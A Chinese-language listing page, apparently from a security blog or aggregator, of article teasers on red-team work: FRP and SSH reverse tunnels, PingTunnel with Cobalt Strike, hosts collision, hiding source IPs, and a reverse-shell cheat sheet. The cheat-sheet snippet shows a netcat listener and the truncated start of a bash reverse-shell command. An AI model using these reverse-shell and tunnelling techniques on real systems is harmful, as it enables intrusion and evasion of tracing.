声明:该文章红队烟雾弹,仅仅学习交流使用,脚本暂无公开,仅提供一种思路Hv已经开始小几天了,蓝队溯源方式千奇百怪,层出不穷,并且直呼:这届红队,我来我也行红队一个不小心就是认识警告红队又一个不小心红队...
利用hosts碰撞暴露内网泄露系统
0x01 hosts碰撞在某些时候我们用IP访问时,目标资产响应多为: 401、403、404、500,但是用域名请求却能返回正常的业务系统,这是因为大多数系统都会需要绑定域名才能访问,而且这种情况默...
【附下载】带你使用frp实现内网穿透详细教程!
点击上方蓝字关注我们1免责声明 本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法...
FRP内网利器使用基础
概述:FRP(Fast Reverse Proxy)快速反向代理官方介绍:“frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以...
米家App回应崩了:公网云网络故障导致
点击蓝字关注我们 前言:由于公网云网络故障,导致米家App、语音控制等相关的服务在4月30日05时30分起出现异常。经过紧急抢修,服务已陆续恢复。4月30日,针对今早“米家App服务出现设备离线无法进...
利用PingTunnel上线cobalt strike
pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。安装服务端首先...
内网穿透工具—FRP
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系刘一手请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后...
【知识积累】反弹shell方法备忘录
bash反弹:首先公网主机监听指定端口,然后肉鸡执行bash命令向公网指定端口发送连接请求 12345公网主机: nc -lvvp 9090肉鸡执行: bash -c 'exec bash ...
代理转发
概念代理转发就是将一个端口,端口可以为主机端口也可以是访问到的人以主机的端口,转发到任意一台可以访问到的IP上 区分正向连接和反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器(...
使用SSH反向隧道进行内网穿透
From:http://arondight.me/对应的情况这篇文章主要介绍了如何利用SSH 反向隧道穿透NAT,并演示了如何维持一条稳定的SSH 隧道。假设有机器A 和B,A 有公网IP,B 位于N...
隐藏源IP,提高溯源难度的几种方案
为什么会有此文:原因一:保护个人隐私是是第一出发点;科技进步飞快,网络也渗透入生活中的方方面面,近几年的隐私泄露事故时有发生,我们该如何保护个人隐私?原因二:得到了大佬的帮助和指点,希望把对我的指点内...
云服务已成为新的攻击热点
公共云越来越受欢迎,2018年报告的云基础设施总开支增长了45.6%。亚马逊AWS保持领先地位,在云服务提供商市场占有31.3%的份额,其次是微软Azure和谷歌云平台。云服务提供商(CSP)提供各种...
5